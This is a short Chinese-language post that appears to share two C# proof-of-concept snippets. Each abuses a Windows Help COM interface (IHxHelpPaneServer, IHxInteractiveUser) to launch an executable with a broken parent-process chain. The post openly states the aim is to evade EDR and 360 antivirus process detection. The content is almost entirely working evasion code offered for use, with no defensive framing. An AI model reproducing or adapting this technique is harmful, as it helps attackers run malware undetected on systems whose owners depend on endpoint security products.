COM进程断链demo,用于打断进程链信任,绕过edr检测,360进程检测等,懂的都懂
IHxHelpPaneServer接口
using System; using System.Runtime.InteropServices; namespace TestHelpPanel { [Guid("8CEC592C-07A1-11D9-B15E-000D56BFE6EE")] [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] [ComImport] public interface IHxHelpPaneServer { void DisplayTask([MarshalAs(UnmanagedType.BStr)] string bstrUrl); void DisplayContents([MarshalAs(UnmanagedType.BStr)] string bstrUrl); void DisplaySearchResults([MarshalAs(UnmanagedType.BStr)] string bstrSearchQuery); void Execute([MarshalAs(UnmanagedType.LPWStr)] string pcUrl); } class Program { static void Main(string[] args) { Type tp = Type.GetTypeFromCLSID(new Guid("8CEC58AE-07A1-11D9-B15E-000D56BFE6EE")); IHxHelpPaneServer helpPane = Activator.CreateInstance(tp) as IHxHelpPaneServer; string fileUrl = "file:///D:/cccc.exe"; helpPane.Execute(fileUrl); }
IHxInteractiveUser接口
using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Text; using System.Threading.Tasks; namespace TestHelpPanel { [Guid("8CEC595B-07A1-11D9-B15E-000D56BFE6EE")] [TypeLibType(TypeLibTypeFlags.FHidden | TypeLibTypeFlags.FOleAutomation)] [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] [ComImport] public interface IHxInteractiveUser { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] void Execute([MarshalAs(UnmanagedType.LPWStr), In] string pcUrl); } class Program { static void Main(string[] args) { Type tp = Type.GetTypeFromCLSID(new Guid("8CEC58E7-07A1-11D9-B15E-000D56BFE6EE")); IHxInteractiveUser pn = Activator.CreateInstance(tp) as IHxInteractiveUser; string file = "file:///D:/cccc.exe"; pn.Execute(file); } } }